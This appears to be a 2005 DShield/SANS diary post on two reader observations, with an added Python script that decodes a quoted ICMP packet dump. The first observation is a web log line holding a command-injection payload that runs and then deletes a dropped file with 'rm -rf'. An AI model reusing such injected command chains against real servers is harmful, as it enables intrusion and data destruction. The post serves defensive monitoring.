Notes from the DShield Forum

Published: 2005-09-16
Last Updated: 2005-09-18 12:58:56 UTC
by Lenny Zeltser (Version: 1)
A few posts to the DShield discussion forum today are worth watching for, even though they are currently single observations and not part of any trend.

Andy Green reported that his server received a scan for the vulnerable script, even though the script was not actually present on his server:

[04:06:01 +0100] GET //
  perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -

In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:

16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0, 
flags [none], length: 56) > xx.xx.xx.xx:
icmp 36: time exceeded in-transit for IP
(tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
xx.xx.xx.xx.11582 > [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7

For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
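
An added example, not part of the original diary or the DShield posts: this Python decodes the hex dump above to recover what tcpdump cut off at `[|tcp]`, namely the TCP ports and sequence number of the packet quoted inside the ICMP error. The function names are my own, and the redacted `xx` bytes are treated as zero, so addresses and checksums are not interpreted.

```python
import re
import struct

# Hex dump copied from the tcpdump output above; "xx" bytes were redacted by the poster.
DUMP = """\
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
"""

# Offset, then at most eight 2-byte groups; the ASCII column is ignored.
LINE = re.compile(r"^0x[0-9a-f]{4}:((?:\s+[0-9a-fx]{4}){1,8})", re.I)

def dump_to_bytes(text):
    """Rebuild packet bytes from the dump lines; redacted 'xx' bytes become 0x00."""
    hexstr = ""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            hexstr += "".join(m.group(1).split())
    return bytes.fromhex(re.sub("x", "0", hexstr, flags=re.I))

def decode_icmp_error(pkt):
    """Decode an ICMP error and the datagram it quotes (IPv4 header + 8 bytes)."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 1:
        raise ValueError("outer packet is not ICMP")
    inner = pkt[ihl + 8:]          # quoted datagram follows the 8-byte ICMP header
    if len(inner) < 20 or inner[0] >> 4 != 4:
        raise ValueError("no quoted IPv4 header")
    in_ihl = (inner[0] & 0x0F) * 4
    flags_frag = struct.unpack("!H", inner[6:8])[0]
    info = {
        "outer_ttl": pkt[8],
        "icmp_type": pkt[ihl], "icmp_code": pkt[ihl + 1],
        "inner_ttl": inner[8], "inner_proto": inner[9],
        "inner_df": bool(flags_frag & 0x4000),
    }
    l4 = inner[in_ihl:in_ihl + 8]  # only the first 8 transport bytes are quoted here
    if inner[9] == 6 and len(l4) == 8:
        info["sport"], info["dport"], info["seq"] = struct.unpack("!HHI", l4)
    return info

if __name__ == "__main__":
    print(decode_icmp_error(dump_to_bytes(DUMP)))
```

Checking the quoted source port and sequence number against the receiving host's own connection records shows whether that host ever sent the packet the ICMP error claims to answer.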
